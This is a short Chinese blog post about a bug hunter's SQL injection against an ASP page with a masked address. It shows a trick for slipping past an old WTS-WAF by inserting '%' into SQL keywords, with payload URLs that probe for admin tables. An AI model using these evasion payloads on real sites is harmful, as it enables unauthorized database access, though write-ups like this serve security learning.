老版本WTS-WAF bypass小记

起因

挖漏洞的时候总是会遇到WAF,绕过记录

漏洞点

***view.asp?big=75&Id=1 漏洞点在Id参数

添加单引号报错

老版本WTS-WAF bypass小记

来一波老套的Id=1 and 1=1 ,出现防火墙

***view.asp?big=75&Id=1%20and%201=1

老版本WTS-WAF bypass小记

bypass

老版本WTS-WAF绕过很简单,在关键字里面加%符号即可

***view.asp?big=75&Id=1%20an%d%201=1

老版本WTS-WAF bypass小记

成功绕过

猜表

猜表名,这个地方使用burpsuite暴力跑就行,也可以手动测一些比较常规的表名,例如admin

***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)

老版本WTS-WAF bypass小记

说明存在admin表,为了证明语句没错,再测一下manager

***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)

老版本WTS-WAF bypass小记

说明注入语句没错,manager表不存在

点到为止

参考链接

相关文章:

  • 2021-07-17
  • 2021-05-14
  • 2021-12-09
  • 2021-11-26
  • 2021-07-28
  • 2023-02-16
  • 2021-05-18
  • 2021-04-19
猜你喜欢
  • 2021-08-11
  • 2022-12-23
  • 2021-10-21
  • 2022-03-11
  • 2023-03-05
  • 2021-12-06
  • 2021-11-26
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode